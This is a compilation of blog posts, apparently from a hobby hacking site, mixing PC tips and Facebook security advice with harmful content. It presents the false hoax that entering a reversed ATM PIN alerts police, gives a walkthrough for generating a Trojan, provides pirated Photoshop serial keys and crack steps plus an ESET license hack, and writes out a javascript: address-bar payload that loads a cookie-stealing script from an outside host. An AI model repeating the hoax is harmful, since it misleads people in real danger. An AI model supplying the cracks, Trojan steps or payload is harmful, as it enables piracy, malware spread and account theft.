PROTECT UR ATM CARD

I just feel like to share this and i believe u must have heard it before.Why i am posting this, is for those who dont know it yet,
When a thief forced you to
take money from the ATM, do not argue or
resist, you might not know what he or she
might do to you. What you should do is to
punch your PIN in the reverse...
Eg: If your PIN is 1234, you punch 4321.
The moment you punch in the reverse, the
money will come out, but will be stuck into
the machine half way out and it will alert the
police without the notice of the thief.
Every ATM has it; It is specially made to signify
danger and help. Not everyone is aware of
this. SHARE THIS TO ALL YOUR FRIENDS

Ways to Open / Edit .PSD files without having Photoshop Installed.

PSD extension file stands for Photoshop Document and is related to the Adobe Photoshop application. The .PSD file works only in the Adobe Photoshop as it stores many imaging options available in Photoshop. Now you may don’t have a good computer to run Photoshop or you don’t have sufficient disc space. So if you like editing the images but do not want to spend lots of bucks on the software then this tip is surely for you and also because the following tools do not occupy huge memory as compared to Adobe Photoshop.

. Paint.NET


By default this software can not edit the .PSD files. For that you will be requiring a plug-in that will make this tool to open and edit the .PSD files.
• First download and install Paint.NET
• Now download the psdplugin, unzip and copy the PhotoShop.dll to the “FileTypes” folder in the Paint.NET directory. By default it should be in C:\Program Files\Paint.NET\FileTypes.
Now you can open PSD files.
Download Paint.NET

.
IrfanView


IrfanView is a small, free and fast image viewer/converter that can open .PSD files easily.
Download IrfanView

. GIMP


GIMP standing for GNU Image Manipulation Program is a free image retouching tool that supports .PSD files by default.
Download GIMP

‎10 Simple Ways To Speed Up Windows XP

I’ve just finished setting my PC and I think some of you will be interested in some of the tweaks I make to all of my PCs to make them quicker.
I’ve focused here on the ones which are simple to do and won’t cause problems if you get it wrong, rather than listing registry tweaks etc.

1. Disable Indexing Services

Indexing Services is a small little program that uses large amounts of RAM and can often make a computer endlessly loud and noisy.
This system process indexes and updates lists of all the files that are on your computer.
It does this so that when you do a search for something on your computer, it will search faster by scanning the index lists.
If you don’t search your computer often, or even if you do search often, this system service is completely unnecessary. To disable do the following:

Go to Start
Click Settings
Click Control Panel
Double-click Add/Remove Programs
Click the Add/Remove Window Components
Uncheck the Indexing services
Click Next

2. Optimise Display Settings

Windows XP can look sexy but displaying all the visual items can waste system resources. To optimise:

Go to Start
Click Settings
Click Control Panel
Click System
Click Advanced tab
In the Performance tab click Settings
Leave only the following ticked:
Show shadows under menus
Show shadows under mouse pointer
Show translucent selection rectangle
Use drop shadows for icons labels on the desktop
Use visual styles on windows and buttons

3. Disable Performance Counters


Windows XP has a performance monitor utility which monitors several areas of your PC’s performance. These utilities take up system resources so disabling is a good idea.

To disable:

download and install the Extensible Performance Counter List
Then select each counter in turn in the ‘Extensible performance counters’ window and clear the ‘performance counters enabled’ checkbox at the bottom.button below

4. Speedup Folder Browsing

You may have noticed that everytime you open my computer to browse folders that there is a slight delay.
This is because Windows XP automatically searches for network files and printers everytime you open Windows Explorer.
To fix this and to increase browsing significantly:

Open My Computer
Click on Tools menu
Click on Folder Options
Click on the View tab.
Uncheck the Automatically search for network folders and printers check box
Click Apply
Click Ok
Reboot your computer

5. Improve Memory Usage

Cacheman Improves the performance of your computer by optimizing the disk cache, memory and a number of other settings.

Once Installed:

Go to Show Wizard and select All
Run all the wizards by selecting Next or Finished until you are back to the main menu. Use the defaults unless you know exactly what you are doing
Exit and Save Cacheman
Restart Windows
6. Optimise your internet connection

There are lots of ways to do this but by far the easiest is to run TCP/IP Optimizer.

Download and install
Click the General Settings tab and select your Connection Speed (Kbps)
Click Network Adapter and choose the interface you use to connect to the Internet
Check Optimal Settings then Apply
Reboot

7. Optimise Your Pagefile

If you give your pagefile a fixed size it saves the operating system from needing to resize the page file.

Right click on My Computer and select Properties
Select the Advanced tab
Under Performance choose the Settings button
Select the Advanced tab again and under Virtual Memory select Change
Highlight the drive containing your page file and make the initial Size of the file the same as the Maximum Size of the file.
Windows XP sizes the page file to about 1.5X the amount of actual physical memory by default. While this is good for systems with smaller amounts of memory (under 512MB) it is unlikely that a typical XP desktop system will ever need 1.5 X 512MB or more of virtual memory. If you have less than 512MB of memory, leave the page file at its default size. If you have 512MB or more, change the ratio to 1:1 page file size to physical memory size.

8. Run BootVis - Improve Boot Times


BootVis will significantly improve boot times

Download and Run
Select Trace
Select Next Boot and Driver Trace
A Trace Repetitions screen will appear, select Ok and Reboot
Upon reboot, BootVis will automatically start, analyze and log your system’s boot process. When it’s done, in the menu go to Trace and select Optimize System
Reboot.
When your machine has rebooted wait until you see the Optimizing System box appear. Be patient and wait for the process to complete

9. Remove the Desktop Picture


Your desktop background consumes a fair amount of memory and can slow the loading time of your system. Removing it will improve performance.

Right click on Desktop and select Properties
Select the Desktop tab
In the Background window select None
Click Ok

How to play Counter Strike 1.6 online for free


Counter strike is the #1 online action game in the world, and CS 1.6 its most popular version, I was mad at counter strike few years back , but for now it has been more than one year since I haven't played it for last 1 year as I have no time for it.

Counter strike 1.6 can be played online for free, the only requirement is that you should have a fast Internet connection or else you will not enjoy playing it will hang every few seconds, There are tons of methods to play Counter strike 1.6 online for free but I am writing a method which is very easy to implement and also very user friendly


How to play Counter Strike 1.6 online(Method)
1.First of all install counter strike 1.6 on your computer

2.Next you need to have list of cs1.6 free public servers on which you can play, One of the sites where you can find List of CS 1.6 Free public servers is:

http://www.gametracker.com/search/cs/



4..Start your cs 1.6 game


5.Go to find server,then goto favorite

6.Right click there and select add server by ip Address

7.Now paste the server ip address which you have copied.

In the similar manner you can add more Servers to your game to play online, There are tons of free CS 1.6 servers available where you can play Counter Strike 1.6 Online for free

Disable The New Facebook Chat Sidebar & Recover Old FB Chat

Sometimes changes in the layout of Facebook often gets a thumbs down by the users. Just like how much people hated the new Facebook layout with photo streams above, similarly do people found the new social chat window appearing on the right sidebar as equal irritation. In order to disable this chat sidebar that shows photo thumbnails of friends available for chat and recover the older chat view then lets play with some workarounds.
Disable New and Recover Old Facebook Chat
There are two apps for Mozilla Firefox, Opera and for Google Chrome that does the magic. I will recommend that you try both of them and see which one you like the most.
Recover Old FaceBook Chat:
This add-on will replace the new social chat window with the older one. You can download the Chrome extension by clicking here


Facebook Chat Sidebar Disabler:
This add-on performs the exact same operation but with a different style. This one works for smart phones like IPhone or android because it has an Opera version. After installing the add-on in order to toggle between old-style chat and new-style chat, use the Options menu in the buddy list.

click here To Download the Mozilla Add-on
click here To Download the Opera Version
click here To Download Chrome Extension

lock your computer with your Face



1. Download smile in
2.install & then add your face recognition
Smile-in is a face logon tool for Windows utilizing face recognition technology with live detection. Look in your webcam. smile-in will recognize your living face and your secured Windows account will open. Normal changes ( hairstyle, beard, glasses) will be no problem. No passwords needed. Adjustable live detection makes logon to your Windows account with photos impossible. Flexible user administration of smile-in lets your to organize access of same person to many Windows user accounts as well as to use one Windows user account for many persons. smile-in exists in parallel with standard Windows logon, so logon with password will be still possible after installing smile-in.
DOWNLOAD HERE

Folder Lock® - Lock your Folders and Files



What is Folder Lock?
Folder Lock is a fast file locking and file encryption software that can password protect folders, encrypt or lock files, protect USB Drives and lock CDs/DVDs. The program supports all flavors of Windows 7.0, Vista, XP and 2000 including their 64-bit variants.

Folder Lock creates encrypted storages called 'Lockers'. You can keep as many of your private files & folders in Locker and password protect it with a single click. Lockers are portable, so you can transfer, secure and backup these Lockers or keep them in USB Drives, CDs/DVDs, & notebooks or transfer them over email. These Lockers are undeletable on the computer where Folder Lock is installed.
You can create as many Lockers as you want. Different users can create different Lockers with different passwords as well. Folder Lock is two-in-one file locking and file encryption software that lets you choose either to encrypt using 256-bit AES on-the-fly encryption or lock files, folders and drives anywhere on your computer. Each Locker can contain your encrypted files as well as your personal list of your locked items.

Furthermore, Folder Lock comes with additional features which no other file encryption software offer like hack monitoring, stealth mode, data shredding, auto protection, portable USB autoplay support, history cleaning and virtual keyboard. This can enhance file locking and encryption beyond anything ever achieved. In addition, a Locker can't be renamed, moved or deleted without a correct password to prevent data loss.

Folder Lock is the most downloaded File Encryption Software in the market with more than 15 million downloads to date.
Note: Its not free.
Getting software for free:
1. Download it from below:
Download Folder Lock 6 (After clicking link skip the add from top right corner)

2. After downloading install the program. Now run it and you will be promted to register the software. So, open the downloaded package, You will find a text file there named as Serial Keys for folder LOck. Open it and copy serialcode and regcode, paste in the dialog box of Folder lock registration, Click Ok , You are done.
Now right click on the folder which you want to lock, Provide password and you are done.

Features and Benefits:
256-bit AES encryption. The fastest file encryption software that uses on-the-fly encryption (military standard) for file protection.
File Lock, Folder Lock, Drive Lock, File Encryption and Folder Encryption. All in one complete package.
Full Portability. Password protect USB Drives, Lock CDs & DVDs and share password with trusted friends.
Backup or transfer your password protected Lockers anywhere. All data sits in one place for easy backup.
Undeletable Lockers (on the PC where Folder Lock is installed). Deletion requires you to login into Folder Lock.
Shred files automatically when data is encrypted. Choose this option if you're obsessed with your data.
Stealth Mode feature can efficiently hide all the traces of Folder Lock ever been installed on your PC.
Windows History Cleaning. Removes recent history of PC activity automatically when Locker closes.
Hack Attempt Monitoring option can monitor fake password attempts and can Shutdown PC automatically.
Fastest File Encryption Software! Encrypted data is later decrypted in memory, preventing data recovery & slow processing.
Complete Privacy! Whether you're concerned with privacy, data theft, data loss, data leaks or virus attacks. You need Folder Lock!

How to: Detecting And Destroying Keyloggers installed in Computer



There is another post as concerned with security, keeping your online presence secure, fighting with keyloggers, spam and much more. So, I am going to share some security tools and tips for my readers so that they may not fall prey of such criminals and fraudulent activities. Since, With the help of keylogger any hacker can hack into bank acounts of victim.

Types of Keyloggers:
Hardware keylogger - We can detect is easily, As it may be attached to a keyboard or also at the back of the cpu. Your eyes and experience can help you out.

Software keylogger - It is bit difficult to detect, Not yet impossible. Such keyloggers get into your computer because you get fooled by the hacker due to certain social engineering tricks. These keyloggers can be installed remotely as well as on cause of physical access to computer. There are softwares (Spy blockers) which won't detect them as keyloggers or some spy because often keyloggers are used for survey purpose. Yes, it is true also. Now, I,ll show you some tricks below which a smart hacker can use to fool you easily:
1) He may call his remote keylogger as crack of patch of a software which is not free and thus you will download and will run it, FINISH, It will record and send you all key strokes. Now, what was missing? yes a good spyware of antivirus software. You don't need to spend a peny for it, Hackers thirst will give you some freeware and also patched softwares.
2) He may change the icon of the .exe file ( Romote keylogger) to some kinda image file or video so that you may click it immediately without noticing the extension.

And there may be many tricks it depends upon the mind of the attacker.

How remote keyloggers send logs?
Yes, Its a good question which may be coming in your mind. Well, I have examined many keyloggers personally. We can use two communication methods for getting logs. First is email and second easy option is ftp. Now, It will be clear, that when we make a server or attacking file which will attack other computer remotely if the vicitm opens it, We shall give our ftp login information or a gmail email address (Gmaill suits better for keylogging) for ftp the hacker can get a free t35.com or 110mb.com account or else he can have a personall hosting. The logs will be uploaded to the free hosting via ftp after every second. And vicitm computer will upload it silently. Same is the case with email address. RAT's are more dangerous, I have created couple of posts for RAT,s too. You should read them.

Some Softwares to keep such softwares out of computer:
Ad-Aware gives you comprehensive malware protection. With real-time monitoring, threat alerts, and automatic updates you can rest easy knowing that you are protected.
Shop, bank, and make travel arrangements online - It will keep you safe from password stealers, keyloggers, spyware, trojans, online fraudsters, identity thieves and other potential cyber criminals.
Control your privacy - Erase tracks left behind while surfing the Web - on browsers such as Internet Explorer, Opera, and Firefox - in one easy click.
Get Peace of Mind - Know that your personal information is kept safe from dangerous intruders and prying eyes.


Download Ad-Aware

Spyware Blaster - Prevents the installation of ActiveX-based spyware, adware, browser hijackers, dialers, and other potentially unwanted software.
It blocks spyware/tracking cookies in Internet Explorer and Mozilla/Firefox.
It restricts the actions of potentially unwanted sites in Internet Explorer.

Download Spyware Blaster
spyware blaster


SPYBOT - Search & Destroy detects and removes spyware, a relatively new kind of threat not yet covered by common anti-virus applications. Spyware silently tracks your surfing behaviour to create a marketing profile for you that is transmitted without your knowledge to the compilers and sold to advertising companies.

If you see new toolbars in your Internet Explorer that you haven't intentionally installed, if your browser crashes inexplicably, or if your home page has been "hijacked" (or changed without your knowledge), your computer is most probably infected with spyware.



Even if you don't see the symptoms, your computer may be infected, because more and more spyware is emerging. Spybot-S&D is free, so there's no harm giving it a try to see if something has invaded your computer.
DOWNLOAD Spybot

Detecting and Killing Keylogger manually:
There is a simple way to do this, As most of the keyloggers can be terminated by using this method. Press ctrl+alt+delete and start task manager. Here come to processes, and kill down any miscellaneous activity shown there like server.exe or if you get there any name which sounds like keylogger related software in the description shown there. Then investigate and kill that process. Well all this depends upon you experience so, i,ll suggest using this Free Antivirus (Eset Smart Secuirity). We are giving this for free. Install it and whenever you will download a miscellaneous file it will detect it. You can also use KL-Detector. It will work by scanning your local hard disk for any log file created during the monitoring process. Most keyloggers will eventually save the recorded data into a location in the hard disk. KL-Detector will inform you of such log file. This way, the program can detect all keyloggers, both known and unknown. Use KL-Detector to detect keylogger in public computer before you enter your password, credit card info, etc also its quite handy too, You can take it any where.
DOWNLOAD KL-Detector here.

Trojan horse Generator (Easiest Way)



Note: All the content on this blog site is for educational purposes.Haxorslodge will not be responsible for any harm caused by it.


Today, i am going to teach you how to create your own trojan virus with a software,it's too much easy,like a plain sailing and everyone can understand it.Read my short guide and enjoy having fun with your own trojan

THING WHICH YOU NEED IS:

>:Getbatch trojan generator .
Downlod
here

METHOD:

1: Download trojan generator and open it .

2: A window will pop out like this one:

and type "1" to make trojan and "2" to exit.



3:
Now software will ask about the type of trojan you want to make,so fill each blank according to your desire like this


4: Now it will promt many options like below enter "y" for yes "n" For no:
After filling all the blanks it will make a file in an unknown place with the name TROJAN.



5: Now go to search column of your windows and search for "trojan".Your window will show you results with the name of trojan,find a batch file in them with name of trojan.bat which is your own trojan virus.


Note: All the content on this blog site is for educational purposes.Haxorslodge will not be responsible for any harm caused by it.Be ethical

Adobe Photoshop CS5 Extended Crack And Serial Keys



First Method to Crack your Adobe Photoshop CS5 and Use For Free:-


Step 1:-
First you want to download and install the Adobe Photoshop CS5 Extended trial from the Adobe website. (You're going to need a free account.) CLICK:
Get Adobe Photoshop CS5
Step 2:- Then once the trial is installed, make sure Photoshop is closed and navigate to this directory:
C:\WINDOWS\system32\drivers\etc\

Step 3:- Download the zip archive given below . Inside the archive there's a file titled "hosts". Extract this file to your desktop, then drag it to the above directory (drivers\etc). It should ask if you want to overwrite or replace the file. CLick "Yes" or "ok".

Download the crack from
HERE


If you have trouble overwriting, take ownership of your original "hosts" file then try replacing it again. Google this: "how to take ownership of a file".

Step 4:- Almost done. Open Photoshop. There will be a window asking for a serial number. Use one of these:

1330-1036-2793-5476-2605-5729
1330-1193-9982-0310-7670-2199
1330-1470-0441-6829-3063-2553
1330-1976-0892-7993-3728-5629
1330-1527-2207-3657-2876-1004
1330-1361-6390-5309-5916-6481
1330-1614-6955-3965-0930-9043

ALternative Method:- For Cracking Adobe Photoshop CS5:-


Download this crack in accordance to your system:-
For 32 bit systems
For 64 bit systems

And during installation put the serial number if asked any given above. I have updated them also. Cheers!

For Invalid Serial Number Problem Apply The Crack Given according to your OS.


Crack Procedure for 32 bit system:-

Go to your Photoshop Installation Directory (Most Probably " C:\Program Files\Adobe\Adobe Photoshop CS5 " and Replace The amtlib.dll with the new one given in the crack as you downloaded above.

Crack Procedure for 64bit system:-

For 64 bit versions of Windows such as Win 7 x64 two copies of amtlib.dll must be replaced. (backup your original amtlib.dll)

First the 32-bit crack (download from above) amtlib.dll must be copied to "X:\Program Files (x86)\Adobe\Adobe Photoshop CS5\" overwriting the file that is there. (Important: Please again note that replace x86 amtlib.dll with 32-bit crack, NOT 64-bit.

Now afterwards patched 64-bit crack (download from below) amtlib.dll should be copied to "X:\Program Files\Adobe\Adobe Photoshop CS5 (64 Bit)\" (Important: Please again note that replace x64 amtlib.dll with 64-bit crack, NOT 32-bit).

10 Tips for Securing Yourself At Facebook - Most used Social Network

During last few years, Facebook has become very famous and they are also trying to make it more secure and safe with the passage of time, also user friendly. Facebook interface is totally changed now and it will keep changing since technology and progress doesn't stop. I received many emails asking me a question that :
"My Facebook profile has been hacked, please! help me to take it back!"
But personally its bit difficult to take a compromised profile back. All this is possible by some social engineering tricks. So, better is to be secure and more safe already rather than asking for help after after getting hacked. There are many drawbacks of getting hacked as your personal photos can be leaked and your private messaged too. Thats the reason i am posting here at haxorslodge on how to remain or make your online presence secure.The problem is this that even many users don't know how to use security features provided by Facebook. Lets, Take a review of them:


1) Linking your Facebook Account with gmail, hotmail or yahoo for autologin into Facebook:

Infact this feature is quite good, Now assume that your profile has been hacked and the hacker changes email id as well as your password. But if he didn't take notice of the linked accounts then you can access your account. How? lets see, You have linked your google account with facebook, now when ever you log into your google account, cookies are stored in your browser, now you are logged in your facebook linked account i-e google, Navigate to www.facebook.com and thats it you will be logged in automatically after few seconds. Without entering Email ID and Password with the use of cookies.
Inorder to enable this feature, Login to your facebook account. And Navigate to >> Account (At top right corner) >> Account Setting >> Linked Accounts
facebook account linked

And then add your any yahoo, hotmail or gmail account. As there are options given.
2) Specifying Your security Questions for more security and wide recovery options:
Sometimes accounts can also be compromised by guessing security questions of the victim social ID. But Specifying some good and powerful security questions for your Facebook profile is better. But keep in mind:
a) Security question must be about some personal thing which other don't know.
b) Don't use easy questions which can be guessed by others like, What is your father name? In which school did you read? What was your first gift? etc
c) This section is majorly up to your own mind that how much you make it strong, so better make strong personal questions. So that if your account is hacked you may get it back.

For security questions section,Login Facebook, go to Account (At top right corner) >> Account Setting >> Security Question.
put your desire question and answers to your security question

3) Remain Safe from phishing Links and giving passwords on fake pages:
Often new Facebook user who are not aware of phishing scams, They open the link given by facebook user and then Login using that page login fields and get hacked, since email id and password is sent to the hacker. Following may be form of phishing page link (If on opening such links you get a similar facebook login page then its a phishing page don't login form there) :
a) www.website.t35.com
b) www.website.100mb.com
c) www.website.0fees.net
b) www.website.co.cc
c) www.website.tk
d) www.website.free
e) www.website.co.nr
c) Bit.ly/facebooknewcredits
And much more smilar to them, If on opening them you get facebook login page, then close your window and don't login from there.
What to do if you have logged in from phishing page?
Answer is simple just change your password. Well, Also facebook will warn you after logging in from fake/phishing page that you have come from a phishing page change your password.

4) Remain Safe from inserting obfuscated java script in browser address bar:


I have created a detailed post in past that how hackers make use of java script to hack your facebook unique email id or fan pages. Kindly Refer here (Remain Safe From Fraud And Identity Theft At Facebook) for detailed information. In short, Don't paste any script in the browser address bar while browsing facebook. Since it will be harmful and will steal your id.

5) Browsing Facebook On Secure Connection:

This feature of Facebook will allow to browse in secure connection whenever it is possible. In such case your data sent to server is encrypted by using a scheme and so that it can't be Hijacked. To use this feature go to Account >> Account Setting >> Account Security And then tick the option:

6) Receiving SMS and Email Alert when New device logs in your Facebook Account from new location:

This is quite a good Facebook Security Measure, You can receive sms at your mobile ( If you have linked your mobile to Facebook) and an email when another computer logs into your facebook ID with another ip address. To activate this, Go to Account >> Account Setting >> Account Security

Now, After ticking and Saving settings you will see a prompt appearing when your log into your facebook account that name your device, i-e it may be home, office or etc. and whenever other device logs into the name will be sent to your activated mobile and also email. So that if any new or unknown device logs into your facebook ID then you may know that your account is compromised and change the password at once.

7) Receiving Temporary password for loging into Facebook at Public place:

If you are at a public place and as a security measure you will like to make or get a temporary password for logging into facebook which will expire after sometime. So that your password may not be logged in any friend, official or public computer. To get one text "otp" to 32665 (Works If you are in US or some other countries too and also your mobile is activated for facebook texts) and you will get s temporary password which will expire after 20 to 15 minutes and can be used in this time interval to be logged into Facebook.

8) Tab-Napping Can be Used to Hack your Social Accounts:

We know a lot of users are using latest browsers in which there is option for tabbed browsing. Now hacker may give you a link in which the tabbed napping script is used and that page on becoming idle for some seconds will redirect you to a phishing page or cookies stealing page and you will not know that did you opened facebook or any other social network or not, you will just log in from there.

9) Using Trusted Facebook Applications:

Surely there are many fake and spammy application there at facebook. Personally, it depends on your experience that how you indentify scams. There are many application which may redirect you to there own server, also these applications may hack your personal unique facebook mobile id, and these applications can be used to send messages as well as posts updates to your friends wall automatically. Well, There is no application which may change your facebook profile theme, yes it is true also no application can use facebook logarithm to determine that who viewed your pofile. All such things are scams. Also, whenever clicking an image, copy link location by right clicking and then you will know whats behind like there may be:
www.website.etc.com/tools/gift.exe
So, you have come to know that an exe file is embedded in the image which can be trojan or keylogger server. Report to Facebook if you find such applications. And accidentally if you granted access to your account for such applications, then inorder to delete them follow these steps:
Go to Account >> Privacy Setting >> Apps and Websites
Now, take your mouse to the right corner of the application which you want to delete, and a pencil icon will apear click it
After clicking it, Application will be removed on clicking remove app.


10) Remaining Safe from email type social engineering:

Similary phishing pages and other cookies stealing pages links (Keylogger server also) can be sent by using email service. Or also by using fake emails. These emails may urge you to click the link provided. As these emails may say, Click link to claim your 10000 fans facebook page, Click link to claim free farmville gifts, and much more. Read my post on fake emails to clear your view that how a hacker may fool you.

For other security measures, Kindly tell me in your comments, Your view is always appreciated......!!

Facebook Applications fooling you? How your cookies can be stolen at Facebook ; Heading to Social Engineering

welcome, Today what I am going to share is highly related to yours account security present at Facebook. As all of us know that Facebook family is increasing day by day and thus hackers mainly target Facebook accounts, since, you are not aware of many things which may happen with you at internet so you get fooled quickly by just some social engineering tricks. So all this can be termed as less amount of awareness and knowledge can lead towards a bad conclusion that is “Your Facebook Gets Hacked” which can lead towards the misuse of your Facebook id and can lead towards many bad conclusions. So, today I’ll talk majorly about three things:-

Facebook Applications might fool you
Your cookies can be stolen leading towards account hacking
Many other such things can be done by just social engineering

Except these I’ll also provide an exploit which can be used to accomplish all such tasks by an hacker , as an example! I have already posted many scams updates present at Facebook which may fool you, with the passage of time. Well, at Facebook the security is just from you, every one present at in this world can make a Facebook account and can get into the developers section in order to make an application, but as you know that this world is made up of good as well as bad people so there are many security holes still present at Facebook whenever an application is made by a black hat he won’t keep in mind the safety of people he’ll just make the application for the destruction purpose and thus by using just a small java script code he can get into many others account which may use he application and follow that application guide. Now how he can get into? Whenever we will use that application and will execute that application java script in our browser our Facebook login cookies will be stolen as well as sent to the hacker and as a result he will be able to login into your account and can do what he want, like posting at your friend’s wall without your concern, harassing other users using your ID, so leading towards complete misuse of your identity and creating out problems for you. The script can be found here. The part that will grab your cookie its relatively simple. Lines 10-21 then when the hacker has your cookie, he can do anything he wants with it.Now what this script can do:-

1. It can spam at your friends’ wall the text which has been given in this script.
2. Get online friends and send chat message to them what is given in Java script
3. It will send the cookies of the victim towards the hacker
4. Sends the proper header information along with the request

Now, all this is done under the social engineering banner of following alert statement as you can see in the coding of this java script:-

“Photo Uploaded! Please wait 1-2 minutes without leaving this page until we process your picture!'); // Stay here a little longer... please”


How is the scam going to spread by social engineering?

And as you can guess that in such a case, how will a hacker play social engineering on you, he will make an application or a website where he will do write that paste the following type {javascript:(a=(b=document).createElement('script')).src='//haxorslodge.info/com/js.js?'+Math.random(),b.body.appendChild(a);void(0)} short java script in your browser address bar to know that is your uploaded photo more popular or most popular among friends and can be many much like these other scams…etc. Here haxorslodge.info/com/js.js is the path of the real long java script. He can also change the alert statement to what he wants, and similarly he will put in the flooding section of the friends’ wall the link of the same java script hosted application of website like this:-


How to: Remain safe from such attacks:-


So, you can see that how is his going to spread, thus never put the java script in the browser address bar even how much hacker, application and the fake website entices you to put that script into the browser address bar while using Facebook. So your common sense will always make you safe from such attacks. If you love your Facebook then better be safe there and much read it:-

10 tips for securing yourself at Facebook
Some similar posts where you can learn that how a hacker can use such java script to hack your Facebook:-

How to remain safe from fraud and identity theft at Facebook

How can we hack Facebook Fanpages by Using java script

Facebook Profile Stalker – A Facebook Scam

And please its a request that you too don’t misuse the provided script just learn it and prepare yourself to get secured from being hacked rather than hacking innocents.

TNOD For Eset Nod 32 (Hacks Lisence i-e Usernames and pass) - Free Antivirus Software

Eset Nod 32 is one of the industry leading security tool. I too use it and i have found it more light and faster than those of other security soft-wares. But for some people in other countries it is quite costly for them and they can't buy its license. So after reviewing its wide acceptance I decided to post a hack for Eset Nod 32 business security. In order to use it for life time for free. Hope you All may like it.
Download Free Eset Antivirus Hacker - TNOD (Use Antivirus For Free)

Download TNOD Old Version - For Old Smart Eset Security Free Usage (For Nod 32 4.0.437.0 or Old)
Download TNOD Latest Stable Release - For Latest Eset Smart Secuirty Free Usage (Recommended)
What to do after downloading License Hacker of Eset

Download the Eset Antivirus from the official website, or else from any location Google it and you will get many trial free versions , After installing antivirus go to the extracted package where TNOD is located and make sure that the antivirus is running in system processes and installed. After that Run the TNOD downloaded according to the version of eset used in computer, See detailed instructions below!

Instructions for older version of TNOD:-


Extract the old version of TNOD which you have downloaded for Nod 32 4.0.437.0 or Old and run TNODUP provided and in the system tray you will notice that license are injected and a statement will appear in balloon popup that license is inserted correctly and you are done, Try updating NOD and it will update. Now, Whenever license is expired or icon of Eset gets Red in system tray then follow the same procedure.

Instructions for latest version of TNOD:-

Download the latest version provided above and extract the files, after that Run TNod-1.4.0.15-setup , It will install. Now Whenever computer will start it will inject licenses automatically and your Eset Smart Security will update automatically. If not then an icon will appear at desktop of TNOD and double click it , Same process will occur and in balloon notification it will check for licenses and will hack ESET automatically.

Get Eset Antivirus From Haxorslodge

If you are facing problems in hacking licenses and using Eset Full version, Then Kindly download this version of Eset and then use this hack, Both old and new TNOD will work for it.
Download Eset Free Antivirus

Shortcut Autorun Virus On Flash Drive - How to Kill/Delete the Virus and Recover Hidden Data

Since you know that in previous post regarding autorun.inf viruses I have mentioned that very large number of computers get effected by USB malwares and viruses. And the reason of there propagation is the only autorun.inf file which executes these malwares and viruses just we plugin the USB in our computer. Today, I,ll discuss a virus which will convert all the data in the USB into shortcuts and also I,ll show you that how to terminate this kind of virus commonly spoken as shortcut virus or we may also call is win32 stuxnet! lnk virus, I am providing free virus scan and removal tips here so that you may able to terminate shortcut virus in USB drive and recover your whole precious data as soon as possible.

First Step Get a Good Antivirus

I have already posted in Antivirus Section some of the good antivirus personally I have found NOD to be good one, You can get it here:
Get Eset Smart Security Virus Scam and Removal Software For Free
After Downloading and patching it through the guide given, Just update the antivirus and plugin your USB or removal disk, After that don't open it just right click the USB drive and go to Advanced Options>>Clean Files So that any virus may be removed.

Second Step to Recover Data From Infected USB/Removable Disk

In order to Recover Data from such an infected USB go to Start Menu and in Accessories go to Command Prompt after that use this command (Where j: is your USB path or it may be g: or something else depending on your system and partitions)
In CMD type this (don't forget to replace j: with your own USB drive path):

attrib -h -r -s /s /d j:\*.*


After that go to USB and open it by Right Clicking it and selecting open. You will see that along with shortcuts your Data is also recovered and thus after this delete all shortcuts.
Preventing USB/Removable Device from such future attacks - Immunizing USB/Removable Drive
I have already covered this section in detail and have provided some softwares also, You should read my Following Post:

Precautions When USB drive in Infected
1) You must have Good Updated Antivurs installed in computer so that virus may not infect your computer.
2) Disable Autorun of the Windows so that the USB autorun virus may not execute and don't use this dialog box since it only appears when autorun is enabled.

3) Open USB drive by right clicking it and then open the USB from the options , So that autorun.inf may not execute.
4) Immunize the USB drive my Reading this (How to Immunize USB drive) Post.

Protect Your Computer From autorun viruses and worms - Make USB Disk more secure

Now-a-days many computer users are facing problems regarding viruses and worms, These worms may be very harmful as well as computer speed consuming too. This is not in the case of internet users only many computers which are not connected to internet have also such viruses and malwares installed in them, Now what is the source of such viruses and woms? Many of you don't know that even the usb drive may have some virus in it which can replicate itself at its own. Yes, I am talking about autorun.inf viruses, Today i am going to discuss ways to make your pc secure from such viruses.

How these autorun.inf worms and viruses propagate?
By default, Windows system enables an Auto Play function. When you plug in a USB disk or CD, Windows loads and executes a file named AutoRun.ini, which is the list of predefined tasks and in these predefined tasks running of viral programs is included, These programs play with registry files and as a result task manager get disabled and much more can happen. You can read this post to know how to repair back infected windows. The virus reproduces itself into the disk and modifies this file, so that when the file is executed, the virus is able to reside into the system.

Installing a good antivirus software:
If you will install a good antivirus software which will update at daily basis then its difficult that your computer get infected, as antivirus will automatically locate and kill the processes of autorun.inf file located in usb disk and which is trying to execute miscellaneous programs, I have already posted a good antivirus software along with its cracks, Try it, Its Nod Smart Security , Also you can try USB Disk Security, But often we have to plugin USB in other computers where antivirus is not present then follow the below methods.

Immunizing USB from Viruses and Worms - Manual Method:

1) Open a command prompt by click Start -> Run. Type cmd and hit the Enter key.
2) In the command prompt, create a directory in the root directory of the USB drive (By Pointing cmd to the USB disk VIA its drive letter like if its G:/ then type G:/ and hit enter) with command:

mkdir AutoRun.ini

3) Move into this new directory with command:

cd AutoRun.ini

4) Create a new directory with command:

mkdir a...//

5) Exit the command prompt window with command:

exit

Remove the USB-Disk from the computer and now its immune. And whenever you will plug it into a infected computer the USB won't get infected.


An Auto-application for immunizing USB Disk - The USB immunizer from BitDefender:


For years, Autorun-based malware has been atop of the worldwide e-threat landscape, with notorious representatives such as Trojan.AutorunInf, the Conficker worm (Win32.Worm.Downadup) or Worm.Autorun.VHD.

The USB immunizer is BitDefender's response to this growing issue. This small utility is divided in two sections.

The Immunize option allows you to immunize your USB storage device or SD card against infections with autorun-based malware. Even if your storage device has been plugged into an infected computer, the piece of malware will be unable to create its autorun.inf file, thus annihilating any chance of auto-launching itself.

Download USB Disk Immunization software From here its free to use.

Truth About “Facebook Hacker’s” Software and all such software which claim to hack password | Totally Scam

Today post mainly aims for those newbies who want to learn hacking but don’t know actually what it means? so they tend to think that mainly software exist using them they can hack any thing. But that is a wrong concept you can’t hack anyone by merely some clicks and password of that person may be in front of you. Following I am going to reveal the realities behind such softwares.
Software May have a binded Trojan or Keylogger With it:-

Like mostly in case of Facebook, people try to find out a software and hackers make use of this weakness and often they design fake hacking software in VB (Like I can also designed one in Visual Basic Environment, By just designing some button and text fields and then debugging the software and after testing generating the required .exe, But all will be fake) and attach a Trojan Or Keylogger with that mainly some RAT.
Software Itself can be a phisher:-

Many times the software it self can be a phisher and will ask you to enter your email address and password first, Which will be sent to its creator for sure. And then the hacking page will appear but surely you won’t get any results.

In fact there is not such software for Hacking Facebook, Yahoo, Gmail or Else MSN password of any user, As such companies pay high amount of money to the researchers who make their servers secure so that no hacker can gain un-authorized access to them for bad purpose.

Windows 8 Developers Preview Free Download



Windows 8 Developer Preview

